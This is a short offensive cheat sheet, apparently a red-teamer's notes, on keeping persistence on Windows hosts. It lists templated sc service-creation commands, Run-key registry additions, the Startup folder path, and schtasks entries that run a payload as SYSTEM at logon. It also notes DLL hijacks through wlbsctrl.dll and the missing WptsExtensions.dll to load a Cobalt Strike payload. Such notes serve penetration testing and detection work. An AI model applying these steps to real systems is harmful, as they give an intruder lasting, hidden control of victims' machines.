Persistence
Service Manipulation
(Can be run remotely)
**Spaces are important in WIN7.
sc create <servicename> binpath= "<c:\PATH>" displayname= "<NAME>" start= auto
sc description <servicename> "<DESCRIPTION>"
sc qc <servicename>
sc start <servicename>
sc stop <servicename>
sc delete <servicename>
sc qfailure (shows value for service failures)
Registry
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "<APP NAME>" /t REG_SZ /f /d "c:\<FILEPATH>"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "<APP NAME>"
wmic useraccount where (name='guy.fleegman') get name,sid (returns a user's SID if needed)
Startup Folder
c:\users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
SCHTASKS
(IF PRIVILEGED - RU and SC ONLOGON options are available)
schtasks.exe /Create /F /SC DAILY /ST 09:22 /TN "<TASKNAME>" /TR "<PAYLOAD_FILEPATH>"
schtasks.exe /Create /F /RU SYSTEM /SC ONLOGON /TN "<TASKNAME>" /TR "<PAYLOAD_FILEPATH>"
schtasks.exe /DELETE /F /TN "<TASKNAME>"
DLL Hijacking
- The "ikeext" service on windows permits persistence on Windows 7; using wlbsctrl.dll. A wrapper dll (named wlbsctrl.dll) is created with a MUTEX that loads a cobalt strike payload (such as a CS DLL).
- WptsExtensions.dll is affiliated with the "schedule" service. It does not exist anymore, and is therefore prone to a dll hijacking attack. The scheduler service starts on reboot.